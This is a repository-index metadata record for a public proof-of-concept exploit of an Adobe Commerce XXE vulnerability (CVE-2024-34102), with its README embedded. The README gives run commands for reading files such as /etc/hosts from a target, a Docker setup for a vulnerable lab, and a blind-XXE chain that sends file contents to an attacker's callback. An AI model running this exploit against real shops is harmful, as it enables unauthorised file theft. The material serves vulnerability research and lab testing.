{"id":23912010,"url":"https://github.com/eqstlab/cve-2024-34102","last_synced_at":"2026-02-25T00:36:30.278Z","repository":{"id":252912206,"uuid":"841861554","full_name":"EQSTLab/CVE-2024-34102","owner":"EQSTLab","description":"Adobe Commerce XXE exploit","archived":false,"fork":false,"pushed_at":"2025-01-12T11:26:54.000Z","size":16,"stargazers_count":3,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-11T14:24:43.873Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EQSTLab.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-08-13T07:33:20.000Z","updated_at":"2025-02-19T07:19:27.000Z","dependencies_parsed_at":"2025-04-12T11:45:48.716Z","dependency_job_id":null,"html_url":"https://github.com/EQSTLab/CVE-2024-34102","commit_stats":null,"previous_names":["eqstseminar/cve-2024-34102","eqstlab/cve-2024-34102"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/EQSTLab/CVE-2024-34102","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-34102","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-34102/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-34102/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-34102/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EQSTLab","download_url":"https://codeload.github.com/EQSTLab/CVE-2024-34102/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EQSTLab%2FCVE-2024-34102/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29806696,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-24T22:43:48.403Z","status":"ssl_error","status_checked_at":"2026-02-24T22:43:18.536Z","response_time":75,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-01-05T08:57:49.866Z","updated_at":"2026-02-25T00:36:30.257Z","avatar_url":"https://github.com/EQSTLab.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-34102\nā˜… Thanks to @th3gokul, Sanjaith3hacker, Chocapikk for the original code base. ā˜…\n## Description\nCVE-2024-34102 : Adobe Commerce XXE vulnerability\ndescription: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.\n## How to use\n### Git clone\n```\ngit clone https://github.com/EQSTSeminar/CVE-2024-34102.git\ncd CVE-2024-34102\n```\n### Install packages\n```sh\npip install -r requirements.txt\n\n```\n### Command\n```sh\npython CVE-2024-34102.py -u \u003cURL_TO_EXPLOIT\u003e -f \u003cFILE_TO_READ\u003e\n```\n\n### Example\n```sh\npython CVE-2024-34102.py https://magento.test -f /etc/hosts\n```\n\n### Output\n![image](https://github.com/user-attachments/assets/1320573f-bb46-4d34-b2bf-42c0a8ce28fd)\n\n## Vulnerable Environment Based on Docker\nThanks to markshust's Docker Configuration for Magento, It isn't hard to make the vulnerable development enviromnet. \nhttps://github.com/markshust/docker-magento\n```sh\n# Create your project directory then go into it:\nmkdir /opt/magento\ncd $_\n\n# Install some stuff (needed for the script)\nsudo apt update\nsudo apt install -y bc curl\n\n# Create Composer's directory (to avoid a weird error)\nmkdir /var/www/.composer/\n\n# Run this automated one-liner from the directory you want to install your project.\ncurl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community\n# Submit credentials when needed.\n\n# Edit hosts file\necho \"127.0.0.1 magento.test\" \u003e\u003e /etc/hosts\n```\n\n![image](https://github.com/user-attachments/assets/4c556255-41c5-489a-9adb-a7bcb4e24169)\n\n## PHPSTORM\nYou can debug your magento using PHPSTORM.\n\n### 1. Turn on your xdebug thru the following command:\n```sh\nbin/xdebug enable\n```\n\n### 2. And then setup your PHPSTORM like:\n![image](https://github.com/user-attachments/assets/b4554989-d2af-452c-ada9-28b4b0352060)\n\n..And then you can debug your magento.\n\n# Attack Scenario\nCreate callback URL (mocky api) -\u003e Blind XXE attack (CVE-2024-34102) -\u003e Send file contents to attacker's instance (SSRFUtility) -\u003e Read the attacker's instance (SSRFUtility)\n\n# Disclaimer\nThis repository is not intended to be XXE exploit to CVE-2024-34102. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.\n\n# EQST Insight\nWe publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.\nhttps://www.skshieldus.com/eng/business/insight.do\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-34102","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Feqstlab%2Fcve-2024-34102","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Feqstlab%2Fcve-2024-34102/lists"}